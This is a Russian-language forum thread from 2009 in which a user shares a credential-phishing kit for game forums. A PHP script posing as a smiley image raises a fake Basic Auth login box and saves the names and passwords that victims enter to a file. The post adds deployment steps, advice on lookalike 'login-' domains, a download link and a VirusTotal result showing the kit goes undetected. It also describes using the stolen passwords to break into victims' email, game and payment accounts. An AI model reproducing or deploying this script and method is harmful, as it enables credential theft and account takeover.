SokQ Posted November 18, 2009 Share Posted November 18, 2009 ============Начало=========== Quote Link to comment Share on other sites More sharing options...
SokQ Posted November 18, 2009 Author Share Posted November 18, 2009 =======================Конец======================== Quote Link to comment Share on other sites More sharing options...
SokQ Posted November 18, 2009 Author Share Posted November 18, 2009 ДОБАВЛЮ : сайты можно и с юкоза, но я регал на www.holm.ru Вот не помню где нашел, классная штука.. Вот описание : Суть угона заключается в простом смайлике, который запрашивает авторизацию, вы регистрируетесь на форуме, ставите себе в подпись, или можете кому то в лс отправить его, или в сообщение добавить [ img ]ссылка на смайл[ /img ] вот и все, как только человек увидит этот смайл, у него выскакивает такая табличка http://i080.radikal.ru/0911/10/65895eb3f9d8.jpg Сверху пишет сайт на котором у вас этот смайл,( потому и рекомендую делать его в типе : login или похожу что то на сайт того форума где разводите ) внизу то что вы уже сами можете написать ,мне нужно было для пульса, я написал pulseworld.ru , это вы можете редактировать в самом скрипте.. Ниже в теме все описано что для этого нужно редактировать собственно это и есть окно авторизации, для того что бы такое прокатило, вам нужно зарегистрировать сайт, с ФТП , я зарегал на h16.ru , но можете и на Ucoz'е, лудше всего регать , как я увидел на своем опыте, сайт примерно такой : login-сайт вашего сервера или что то такое, например : login-zhyk.h16.ru , ну или что то в этом роде , круче придумаете , будет больше шанс развести кого то.. заливаете файлы с архива, на свой сайт, точней на ФТП, вам нужно залить все файлы, и .htaccess , не знаю как у вас но у меня через тотал и через файрзиллу не лило, пришлось качать ФТП Commander. сама суть развода заключается вот в чем: вы кидаете смайл, который запрашивает авторизацию, т.к. это не смайл а PHP скрипт.. я сам в этом не очень конечно разбираюсь но стараюсь на нормальном языке рассказать.. как понял сам. Это код скрипта, тут все описано, в зависимости где хотите разводить , надо менять скрипт , то есть эту строчку : "Header('WWW-Authenticate: Basic realm="pulseworld.ru"');" я например просто ради прикола хотел потестить работает ли оно на самом деле, оказалось работает.. на ФТП моего сайта мне в файле passwords.txt в него мне записывали пароли тех кто авторизовался в моем смайле... каждый акк и пасс в новом рядке. код <? //делаем скрипт картинкой header("Content-type: image/gif"); //делаем изображение смайликом из архива $image = imagecreatefromgif('mellow.gif'); if(!$_COOKIE['LOGON']) { $login = $_SERVER['PHP_AUTH_USER']; $pass = $_SERVER['PHP_AUTH_PW']; //Авторизация пройдёт, если пароль больше 4-ёх символов и вообще написан логин if(strlen($pass) <= 4 || !$login) { Header('HTTP/1.1 401 Unauthorized'); Header('WWW-Authenticate: Basic realm="Авторизуйтесь Пожалуйста"'); } elseif($login) { //ставим кукис, чтобы при повторном заходе авторизации небыло, в самом начале проверка есть ли кукис )) setcookie('LOGON',md5($pass)); //запишем пароли в файл $f = fopen('passwords.txt', 'ab'); //passwords.txt fwrite($f, $login." ||| ".$pass."\r\n"); //в формате LOGIN ||| PASSWORD fclose($f); } } imagegif($image); imagedestroy($image); ?> Это конечно круто, но зачем нам какой то акк от форума, какое он даст нам преимущество.., а вот какое: Вот мы уже знаем АКК и пасс ,человека которого развели, пусть для примера это будет .. Акк : qip пасс: piq ну попадется на развод много народу , нам нужно выбрать того, у кого на ваш взгляд - может быть Какой то нормальный шмот, или пушка или еще какие то преимущества , что бы не делать всего этого зря. На форуме заходим в вкладку изменить эмейл, там видим, пишет: Ваш текущий эмейл например будет : qip@mail.ru , в большинстве случаев пароль от форума соответствует паролю от эмейла в 80-90% случаях.. С эмейла нам тоже ничего не взять,"но" на эмейле может быть регистрации с других серверов, и в них пароли и аккаунты от сервера, например регистрируемся на ла2 ворлд, и тебе на эмейл приходит сообщение, "Поздравляем с успешной регистрацией, ваш аккаунт такой то , и пароль такой то" Так можно найти много хорошего, даже те же пароли от Веб мани, или что то в этом роде.. и даже тот же контакт, в котором могут быть голоса, Вот и сама ссылка на файл, в архиве есть видео мануал, и еще файл блокнота _http://depositfiles.com/ru/files/s3nvp0ieh?redirect в котором есть описание автора, этой проделки, но описание на этом форуме ,Описание делал сам,мой мануал с тем что в архиве не имеет ничего общего, (оттуда ничего не копировал), мануал писал я сам . вот мой смайл, можете вводить авторизацию любые слова, и у вас покажет смайл, можете нажать отменить и все одно увидите, но при разводе народ вводит свой акк потому что думают - что это окно авторизации для форума _http://login-vh.h16.ru/1/smile.gif вот отчет с вирус тотала Файл basic-auth_vs_forums.rar получен 2009.11.11 18:14:59 (UTC) Антивирус Версия Обновление Результат a-squared 4.5.0.41 2009.11.11 - AhnLab-V3 5.0.0.2 2009.11.11 - Antiy-AVL 2.0.3.7 2009.11.11 - Authentium 5.2.0.5 2009.11.11 - Avast 4.8.1351.0 2009.11.11 - AVG 8.5.0.423 2009.11.11 - BitDefender 7.2 2009.11.11 - CAT-QuickHeal 10.00 2009.11.11 - ClamAV 0.94.1 2009.11.11 - Comodo 2919 2009.11.11 - DrWeb 5.0.0.12182 2009.11.11 - eSafe 7.0.17.0 2009.11.11 - eTrust-Vet 35.1.7115 2009.11.11 - F-Prot 4.5.1.85 2009.11.11 - F-Secure 9.0.15370.0 2009.11.09 - Fortinet 3.120.0.0 2009.11.11 - GData 19 2009.11.11 - Ikarus T3.1.1.74.0 2009.11.11 - K7AntiVirus 7.10.893 2009.11.10 - Kaspersky 7.0.0.125 2009.11.11 - McAfee 5799 2009.11.11 - McAfee+Artemis 5799 2009.11.11 - McAfee-GW-Edition 6.8.5 2009.11.11 - Microsoft 1.5202 2009.11.11 - NOD32 4596 2009.11.11 - Norman 6.03.02 2009.11.10 - nProtect 2009.1.8.0 2009.11.11 - Panda 10.0.2.2 2009.11.11 - PCTools 7.0.3.5 2009.11.11 - Rising 22.21.02.09 2009.11.11 - Sophos 4.47.0 2009.11.11 - Sunbelt 3.2.1858.2 2009.11.11 - Symantec 1.4.4.12 2009.11.11 - TheHacker 6.5.0.2.065 2009.11.11 - TrendMicro 9.0.0.1003 2009.11.11 - VBA32 3.12.10.11 2009.11.10 suspected of RAR.MailBomb ViRobot 2009.11.11.2031 2009.11.11 - VirusBuster 4.6.5.0 2009.11.10 - Дополнительная информация File size: 5646562 bytes MD5...: 6dbbd5dc19eaeb1e5069adcca4ea69a6 SHA1..: 60440cbe0e4592c27fbc79053bed053aca404c0d SHA256: 166162f12a7d09dda1935243b1936df6290c5c0af2abf6e55545e78ced7fe483 ssdeep: 98304:Bieh9wG2pr3/y35tgghFZAeyXjOul1FHKgDZ1DQQpFBxRS4QCp5SdSoWOf<br>SlYU/8:BiO923/a5zZvcHKkzDQQp28inrAv/YUq<br> PEiD..: - PEInfo: - RDS...: NSRL Reference Data Set<br>- pdfid.: - Quote Link to comment Share on other sites More sharing options...
chito Posted November 19, 2009 Share Posted November 19, 2009 vot nedavno u menia kajdii raz kogda zaxadil na nekotorix saitax postoianno viskakivalo okno s etoi avtorizaciei, nekak ne mog poniat' 4to eto takoe i windous pereustanovil))))) dumal eto virus... hmm poxodu tyt vse rabochee toka vot budet slojno razobratsia kak eto delat'. na pervii vzgliad dovolno vse zaputanno) Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.
Note: Your post will require moderator approval before it will be visible.